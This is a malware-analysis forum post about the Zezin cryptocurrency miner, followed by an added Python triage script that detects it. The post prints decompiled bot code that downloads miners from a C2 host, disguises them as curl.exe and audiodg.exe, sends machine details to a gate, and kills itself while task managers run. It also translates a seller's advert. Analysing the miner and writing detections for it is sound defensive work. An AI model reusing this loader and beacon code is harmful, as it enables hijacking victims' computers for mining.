A forum for reverse engineering, OS internals and malware analysis 

#31113 by Xylitol, Sun Dec 10, 2017 11:31 pm
New Monero miner called Zezin, due to its PDB (and also because the other AV signatures suck), originally found by siri (I guess).
Its particularity is having a control panel:
https://twitter.com/CryptoInsane/status ... 3919035392
https://twitter.com/CryptoInsane/status ... 0389664769

Sample in attachment (17 KB): VxVault - VT
Connects to a server to get the mining tool and starts mining.
Attempts to detect if one of these processes is running: taskmgr, procexp, ProcessHacker, procexp64.
And if yes, it "hides" (kills, lol, what did you expect) the miner till these processes disappear.
- Settings:
Code:
internal class Settings
{
    // Fields (decompiled; comments added for readability)
    public const string dcr_name = "audiodg.exe";                          // on-disk name given to the Decred miner
    public const string DcrArgs = "--blake256 -o http://dcr.pool.mn:4722 -u vlad12345123.user -p password"; // Decred miner args: blake256 algo, pool, worker, password
    public const string DcrBlake = "http://185.58.206.45/panel/mr/blake256.cl"; // OpenCL kernel fetched for GPU mining
    public static bool DcrEnable = false;                                  // Decred mining is off by default
    public const string DcrUrl = "http://185.58.206.45/panel/mr/conhost.exe"; // Decred miner binary as served by the panel
    public static string ExecutableDir = Environment.CurrentDirectory;
    public static string ExecutablePath = Application.ExecutablePath;
    public const string Gate = "http://185.58.206.45/panel/gate.php";      // check-in / command gate
    public const string Mutex = "1";                                       // single-instance mutex name
    public const int Timeout = 30;
    public const string Update = "http://185.58.206.45/panel/set.php";     // config / update endpoint
    public const string xmr_name = "curl.exe";                             // on-disk name given to the Monero miner
    public const string XmrArgs = "-o pool.minexmr.com:4444 -u 43GmE9A1TQo7sNS7CHUvvbgK1eDTYd1FtQKnP27URLkngsaxkfHKBogJaHEf1CmnbeLaNAUdmCqRoX6iBNLDy4RyKDHXy4o -p x -t 4 --donate-level=1"; // Monero miner args: pool, wallet, 4 threads, 1% donate level
    public const string XmrUrlX32 = "http://185.58.206.45/panel/mr/curl.exe";    // 32-bit Monero miner
    public const string XmrUrlX64 = "http://185.58.206.45/panel/mr/audiodg.exe"; // 64-bit Monero miner (served as audiodg.exe, dropped as curl.exe)
}
- Main routine:
Code:
internal class Program
{
    // Methods (decompiled; comments added for readability)
    private static void Main(string[] args)
    {
        try
        {
            OnlyOneInstance.CheckIstance(); // single-instance check (Settings.Mutex)
            StartUp.Add();                  // persistence (the advert claims "autorun, not registry")
            Miners.RunXmr();                // download and start the Monero miner
            Miners.RunDcr();                // download and start the Decred miner (if DcrEnable)
            new Controller();               // presumably the watchdog that kills the miner while taskmgr/procexp/ProcessHacker run
            Update.Logic();                 // presumably polls Settings.Update (set.php) for new config/updates
        }
        catch
        {
            // every exception is swallowed
        }
    }
}
- Various parts:
Code:
// Decred miner: served by the panel as conhost.exe, dropped as audiodg.exe (Settings.dcr_name)
DownloadFile("http://185.58.206.45/panel/mr/conhost.exe", DirectoryWithDcr + "audiodg.exe");
DropMinerDcr();
---
// Monero miner: one binary per bitness, both dropped as curl.exe (Settings.xmr_name);
// the 64-bit build is served under the name audiodg.exe
DownloadFile(SystemInformation.Is64Bit ? "http://185.58.206.45/panel/mr/audiodg.exe" : "http://185.58.206.45/panel/mr/curl.exe", DirectoryWithXmr + "curl.exe");
DropMinerXmr();
---
// Check-in: hardware ID, bitness, bot version, GPU and CPU names, plus the current time as a cache-buster.
// Values are concatenated straight into the query string without URL encoding.
public static void GetCommands()
{
    object[] args = new object[] { SystemInformation.HardwareId, SystemInformation.Is64Bit, "1", SystemInformation.GetGpuName(), SystemInformation.GetCpuName(), DateTime.Now };
    string parameter = string.Format("?machine_id={0}&x64={1}&version={2}&video_card={3}&cpu={4}&junk={5}", args);
    GetResponse("http://185.58.206.45/panel/gate.php", parameter);
}
Some stats from the guy spreading the sample:
Code:
Address: 43GmE9A1TQo7sNS7CHUvvbgK1eDTYd1FtQKnP27URLkngsaxkfHKBogJaHEf1CmnbeLaNAUdmCqRoX6iBNLDy4RyKDHXy4o
Pending Balance: 0.099649891113 XMR
Personal Threshold (Editable):
0.500 XMR
Total Paid: 0.000000000000 XMR
The following stats are only for the base address and not all workers:
Last Share Submitted: 3 days ago
Hash Rate: 0.00 H/sec
Total Hashes Submitted: 487883029
epic fail profit.

Some known servers used by Zezin:
Advert from 14 Oct 2017, sold by 'A310':
https://i.imgur.com/Xm5fgiw.png

[Translated from Russian]
Bot:
- CPU support (detection: x32/x64)
- GPU support (detection: Radeon/Nvidia).
- Hides the miner from most task managers.
- The bot can be updated.
- Autorun (not via the registry).
- A Tor-enabled version of the bot is available (handed out only in very exceptional cases).
- Miner control (in any case the miner will be restored as long as the bot is alive).
- Backup callback address. (Optional)
- Random worker generation based on the machine ID. (Optional)
- Free rebuilds.
- Size: 60 KB.
- NET 2.0.
- All updates and any support for the bot are free.
- The miner configuration can be changed directly from the panel (pool, wallet, load, etc.).

Standard miner build:
Monero (CPU) + Optional: Decred (GPU)

Language: C#

Panel features:

- Dashboard:
[*] Online, Alive, All time, Per day.
[*] Latest machines.

- Machines:
[*] Statistics on all bots.
[*] Unique machine ID, bitness, bot version, video card, CPU, first online, last online.

- Update:
[*] Ability to update the bot.

- Arguments:
[*] Ability to change the miner configuration.

Price of the kit: $125.

Contacts:
PM
Jabber: a310@exploit.im

---

Bot:
- CPU support (detection: x32 / x64)
- GPU support (detection: Radeon / Nvidia).
- Miner is not visible if detected (task manager, Process Explorer, etc.)
- Ability to update the bot (for changing the miners, new functionality).
- Hides the miner from most task managers.
- A Tor version of the bot is available (in rare cases).
- Autorun (not the registry).
- You can change the configuration of the miner directly from the panel (pool, wallet, load, etc.).
- Random generation of workers based on the machine's ID. (Optional)
- Control of the miners (in any case, the miner will be restored while the bot is alive).
- Free rebuilds.
- Size: 50 KB.
- NET 2.0.
- All updates and any support for the bot are free.

Standard miner build:
Monero (CPU) + Optional: Decred (GPU)

Panel:

- Dashboard:
[*] Online, Alive, All Time, Day.
[*] Last Machines.

- Machines:
[*] Statistics for all bots.
[*] Unique machine ID, x32/x64, Bot Version, VideoCard, CPU, First Online, Last Online.

- Update:
[*] Update The Bot.

- Arguments:
[*] Ability to change the configuration of the miner.

Price of the kit: $125.

Contacts:
PM
Jabber: a310@exploit.im
+3 samples in attachment:
https://www.virustotal.com/en/file/e6ed ... 512959976/ - amazonccc.ru
https://www.virustotal.com/en/file/5d8d ... 512959977/ - amazonccc.ru
https://www.virustotal.com/en/file/bc6c ... 512959978/ -159.224.138.20
Attachments: infected (153.5 KiB), infected (9.83 KiB)
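An added triage example, not code from Xylitol's post or from the Zezin bot itself: it turns the indicators above (miners dropped as curl.exe / audiodg.exe outside System32, the XmrArgs / DcrArgs command lines, and the gate.php beacon built by GetCommands()) into checks run over constructed process-creation and HTTP events. The pipe-separated event format, the drop directories under AppData and the sample events are assumptions made for this example, not telemetry from any product.

```python
#!/usr/bin/env python3
"""Triage helpers for the Zezin indicators described in the post above.

Added example, not code from the post or from the bot. The pipe-separated
event format ("proc|image|cmdline", "net|host|url") and the sample events
below are constructed for this example, not real telemetry from any product.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Names the bot gives its dropped miners (Settings.xmr_name / dcr_name and the
# DownloadFile() targets) and the directories where the real binaries live.
MASQUERADED_NAMES = {"curl.exe", "audiodg.exe", "conhost.exe"}
LEGIT_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

# Markers lifted from Settings.XmrArgs / Settings.DcrArgs.
MINER_ARG_MARKERS = ("--donate-level", "--blake256")
POOL_RE = re.compile(r"-o\s+(?:https?://)?([\w.-]+):(\d+)")
WALLET_RE = re.compile(r"-u\s+(\S+)")
C2_HOST = "185.58.206.45"          # host of Settings.Gate / Settings.Update
GATE_PATH = "/panel/gate.php"
BEACON_FIELDS = ("machine_id", "x64", "version", "video_card", "cpu")


def check_process(image_path, command_line):
    """Return the reasons a process-creation event looks like a Zezin miner.

    An empty list means nothing matched. The name check catches the
    masquerade (curl.exe / audiodg.exe outside a system directory); the
    argument checks catch the mining command line even if the file was renamed.
    """
    reasons = []
    path = image_path.lower()
    name = path.rsplit("\\", 1)[-1]
    if name in MASQUERADED_NAMES and not path.startswith(LEGIT_DIRS):
        reasons.append(f"{name} outside a system directory: {image_path}")
    if any(marker in command_line for marker in MINER_ARG_MARKERS):
        reasons.append("miner-specific argument on the command line")
    pool = POOL_RE.search(command_line)
    if pool:
        reasons.append(f"pool {pool.group(1)}:{pool.group(2)}")
    wallet = WALLET_RE.search(command_line)
    if wallet:
        reasons.append(f"wallet/worker {wallet.group(1)}")
    return reasons


def parse_gate_beacon(url):
    """Return the GetCommands() fields from a gate.php URL, or None if not a beacon."""
    parts = urlsplit(url)
    if parts.path != GATE_PATH:
        return None
    query = parse_qs(parts.query)
    return {field: query.get(field, [""])[0] for field in BEACON_FIELDS}


def triage(events):
    """Run both checks over 'proc' and 'net' events; return one finding per hit."""
    findings = []
    for event in events:
        kind, first, second = event.split("|", 2)
        if kind == "proc":
            reasons = check_process(first, second)
            if reasons:
                findings.append(("proc", first, reasons))
        elif kind == "net":
            beacon = parse_gate_beacon(second)
            if beacon is not None or first == C2_HOST:
                findings.append(("net", first, beacon))
    return findings


# Constructed sample events: a benign conhost.exe, the two dropped miners with
# the command lines from Settings, the gate.php beacon, and benign traffic.
SAMPLE_EVENTS = [
    "proc|C:\\Windows\\System32\\conhost.exe|conhost.exe 0x4",
    "proc|C:\\Users\\bob\\AppData\\Roaming\\xmr\\curl.exe|curl.exe -o pool.minexmr.com:4444 "
    "-u 43GmE9A1TQo7sNS7CHUvvbgK1eDTYd1FtQKnP27URLkngsaxkfHKBogJaHEf1CmnbeLaNAUdmCqRoX6iBNLDy4RyKDHXy4o -p x -t 4 --donate-level=1",
    "proc|C:\\Users\\bob\\AppData\\Roaming\\dcr\\audiodg.exe|audiodg.exe --blake256 "
    "-o http://dcr.pool.mn:4722 -u vlad12345123.user -p password",
    "net|185.58.206.45|http://185.58.206.45/panel/gate.php?machine_id=ABCD1234&x64=True"
    "&version=1&video_card=Radeon&cpu=Intel&junk=x",
    "net|example.com|http://example.com/index.html",
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

Run stand-alone it reports the two miners and the beacon and stays quiet on the benign events. The name check alone would miss a rebuild that drops the miner under another name, which is why the pool, wallet and `--donate-level` / `--blake256` checks are separate; since the advert offers random worker names per machine, the wallet address is the stable Monero indicator while the Decred `-u` value carries a worker name that may vary.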